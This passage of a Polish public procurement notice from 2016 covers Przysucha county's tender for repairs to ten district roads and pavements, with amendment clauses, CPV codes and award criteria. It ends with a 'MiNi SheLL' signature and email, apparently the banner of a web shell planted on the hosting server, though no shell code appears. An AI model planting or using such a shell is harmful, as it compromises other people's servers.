3) Zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie terminie,
b) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych udokumentowanych w formie pisemnej,
c) błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie,
d) konieczności uzyskania zmian lub uzgodnień, mogących spowodować wstrzymanie robót,
e) konieczności zmiany zakresu robót i finansowania,
f) konieczności wykonania dodatkowych badań i ekspertyz,
g) prac lub badań archeologicznych, wykopalisk, powodujących konieczność wstrzymania robót objętych niniejszą umową, 
h) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, w tym udzielenie w trakcie realizacji zamówień dodatkowych i/lub uzupełniających, związanych z realizacja zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia) , 
i) wstrzymania realizacji robót przez uprawniony organ z powodu znalezienia niewybuchów i/lub niewypałów,
j) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy, 
k) Wystąpienia odmiennych od zakładanych warunków geologicznych i/lub terenowych,
l) Wystąpienia przedłużania się okresu osiągania parametrów technologicznych , nie zawinionych przez Wykonawcę,
ł) Wystąpienia innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy skutkujących niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych kontraktem    
W/w zmiany do umowy dopuszczalne są na następujących warunkach:
a) - ad. Pkt1) - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego,
b) - ad. Pkt2) - zmiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty oraz zmiana sposobu wykonania zamówienia powodująca usprawnienie procesu budowy, zwiększenia bezpieczeństwa na budowie  pod warunkiem nie zwiększenia ceny, 
c) - ad. Pkt2) - w zakresie nie powodującym zwiększenia wynagrodzenia wykonawcy określonego w niniejszej umowie, 
d) - ad. Pkt3):
- lit. a) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania
-  lit. b) - o czas trwania niesprzyjających warunków atmosferycznych, które uniemożliwiają wykonanie zamówienia, 
- lit. c), d), e), f), g), h), i), j), k), l), ł) - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy, lub czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do wykonania dodatkowych ekspertyz, badań,
W przypadku wystąpienia którejkolwiek okoliczności wymienionej wyżej termin okresu przewidzianego na ukończenie robót może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty nie dłużej jednak niż okres trwania tych okoliczności.   
Pozostałe zmiany:
a)  Zmiany dotyczące zatrudnienia podwykonawców w przypadku gdy Wykonawca   
     oświadczył, iż wykona umowę osobiście,
b) Zmiany dotyczące rezygnacji z podwykonawstwa w przypadku  gdy Wykonawca   
     oświadczył, iż wykona umowę przy pomocy podwykonawców,
c)  Zmiany podwykonawców oraz zakresu podwykonawstwa w przypadku gdy  
     Wykonawca wykonuje umowę przy pomocy podwykonawców, przy czym zmiana 
     podmiotu, który uczestniczy w realizacji części zamówienia jako podwykonawca   
     na  potencjale którego opierał się Wykonawca  składając ofertę będzie możliwa,  
     ale jedynie  pod warunkiem, że nowy podmiot wykaże spełnienie warunków udziału  
    w postępowaniu, które były wymagane przez Zamawiającego w ogłoszeniu i SIWZ.  
d) Zmiany osób wymienionych w §5  umowy (inspektor nadzoru, kierownik budowy) w 
     przypadku zaistnienia takiej konieczności (choroba, śmierć, inne zdarzenia losowe)  
Warunki dokonania zmian: 
A. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, 
     wyrażoną na piśmie, pod rygorem nieważności, 
B. Strona występująca o zmianę postanowień zawartej umowy: 
     - opisze zaistniałe okoliczności, 
     - uzasadni zaistnienie powyższych okoliczności, 
C. Wniosek o zmianę postanowień zawartej umowy musi być sporządzony na piśmie
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.przysucha.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Aleja Jana Pawła II 10, 26-400 Przysucha, pokój nr 27 lub za zaliczeniem pocztowym. 
Cena formularza - 433,94 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2016 godzina 09:30, miejsce: Aleja Jana Pawła II 10, 26-400 Przysucha, pokój nr 32 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr1
Remont drogi powiatowej Nr 1689W gr. woj. - Myślakowice - Różanna - Wysokin od km 5+295 do km 6+695.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr1
Remont drogi powiatowej Nr 1689W gr. woj. - Myślakowice - Różanna - Wysokin od km 5+295 do km 6+695
Kod CPV:  45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki mineralno - bitumicznej  asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości śr  3 cm. oraz robót towarzyszących..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.10.00.00-8, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr2
Remont drogi powiatowej Nr 3326W dr. Nr 48 - Podczasza Wola - Kozieniec - Potworów od km 0+745 do km 1+635.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr2
Remont drogi powiatowej Nr 3326W dr. Nr 48 - Podczasza Wola-Kozieniec-Potworów od km 0+745 do km 1+635
Kod CPV: 
45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki mineralno - bitumicznej  asfaltowej - średnio 75 kg/m2, warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości  3 cm. oraz robót towarzyszących..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.10.00.00-8, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr3
Remont drogi powiatowej Nr 3314W Odrzywół - Kadź - Łojków  od km 7+197 do km 7+450.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr3
Remont drogi powiatowej Nr 3314W Odrzywół - Kadź - Łojków  od km 7+197 do km 7+450
Kod CPV: 
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe 
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości  śr. 3 cm. oraz robót towarzyszących..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr4
Remont drogi powiatowej Nr 3341W Jabłonica - Pogroszyn  od km 1+210 do km 2+825.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr4
Remont drogi powiatowej Nr 3341W Jabłonica - Pogroszyn  od km 1+210 do km 2+825
Kod CPV: 
45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe 
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości  śr. 3 cm. oraz robót towarzyszących..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.10.00.00-8, 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr5
Remont drogi powiatowej Nr 3340W Długa Brzezina - Bryzgów - Stefanków od km 3+547 do km 4+382.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr5:
Remont drogi powiatowej Nr 3340W Długa Brzezina - Bryzgów - Stefanków  
od km 3+547 do km 4+382
Kod CPV: 
45100000-8 Przygotowanie terenu pod budowę,
45111240-2 Roboty w zakresie odwadniania gruntu
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe,
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 100 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości 3 cm. oraz robót towarzyszących.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.11.12.40-2, 45.10.00.00-8, 45.23.31.40-2, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr6
Remont drogi powiatowej Nr 3313W Drzewica - Rusinów - Sady Kol. od km 12+095 do km 13+940.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr6:
Remont drogi powiatowej Nr 3313W Drzewica - Rusinów - Sady Kol. od km 12+095 do km 13+940
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45111240-2 Roboty w zakresie odwadniania gruntu,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233290-8 Instalowanie znaków drogowych,
45233292-2 Instalowanie urządzeń ochronnych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej średnio - 75 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości 3 cm. oraz robót towarzyszących.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.10.00.00-8, 45.11.12.40-2, 45.23.32.90-8, 45.23.32.92-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr7
Remont drogi powiatowej Nr 3329W Potworów - Jamki - Skrzyńsko od km 4+308 do km 5+340.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr7
Remont drogi powiatowej Nr 3329W Potworów - Jamki - Skrzyńsko  od km 4+308 do km 5+340
Kod CPV:
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
45233220-7 Roboty w zakresie nawierzchni dróg,
45233140-2  Roboty drogowe, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej średnio - 75 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości 3 cm. oraz robót towarzyszących.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.11.12.00-0, 45.23.31.40-2, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr8
Remont drogi powiatowej Nr 3329W Potworów - Jamki - Skrzyńsko od km 15+038 do km 16+220 - chodnik m. Wistka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr8:
Remont drogi powiatowej Nr 3329W Potworów - Jamki - Skrzyńsko 
od km 15+038 do km 16+220 - chodnik m. Wistka
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45233222-1 Roboty budowlane w zakresie układania chodników i asfaltowania, 
45233290-8 Instalowanie znaków drogowych,
45233221-4 Malowanie nawierzchni,
45233292-2 Instalowanie urządzeń ochronnych,
Zakres zadania obejmuje wykonanie chodnika z kostki brukowej wraz z robotami towarzyszącymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.10.00.00-8, 45.23.32.90-8, 45.23.32.21-4, 45.23.32.92-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr9
Remont drogi powiatowej Nr 3320W Karczówka - Goździków od km 2+172 do km 3+532.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr9:
Remont drogi powiatowej Nr 3320W Karczówka - Goździków od km 2+172 do km 3+532
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości śr 3 cm. oraz robót towarzyszących.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.10.00.00-8, 45.23.31.40-2, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr10
Remont drogi powiatowej Nr 3322W Drzewica - Bieliny - Gielniów od km 2+936 do km 3+484 - chodnik m. Bieliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr10:
Remont drogi powiatowej Nr 3322W Drzewica - Bieliny - Gielniów od km 2+936 do km 3+484 - chodnik m. Bieliny
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45233222-1 Roboty budowlane w zakresie układania chodników i asfaltowania, 
45233290-8 Instalowanie znaków drogowych,
45233221-4 Malowanie nawierzchni,
45233292-2 Instalowanie urządzeń ochronnych,
Zakres zadania obejmuje wykonanie chodnika z kostki brukowej wraz z robotami towarzyszącymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.10.00.00-8, 45.23.32.90-8, 45.11.12.40-2, 45.23.32.92-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com